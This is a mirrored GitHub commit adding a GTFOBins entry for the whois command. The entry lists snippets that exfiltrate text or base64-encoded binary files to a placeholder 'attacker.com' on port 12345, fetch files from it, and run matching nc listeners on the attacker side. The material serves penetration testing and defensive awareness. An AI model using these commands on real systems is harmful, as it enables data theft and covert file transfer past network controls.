mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add whois
Thanks to https://twitter.com/info_dox/status/1001985728342102017
This commit is contained in:
parent
d95bc8a8dc
commit
3a619c7777
31
_gtfobins/whois.md
Normal file
31
_gtfobins/whois.md
Normal file
@ -0,0 +1,31 @@
|
||||
---
|
||||
description: |
|
||||
`whois` hangs waiting for the remote peer to close the socket.
|
||||
functions:
|
||||
upload:
|
||||
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
whois -h $RHOST -p $RPORT "`cat $LFILE`"
|
||||
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "where_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
whois -h $RHOST -p $RPORT "`base64 $LFILE`"
|
||||
download:
|
||||
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=where_to_save
|
||||
whois -h $RHOST -p $RPORT > "$LFILE"
|
||||
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=where_to_save
|
||||
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
|
||||
---
|
Loading…
Reference in New Issue
Block a user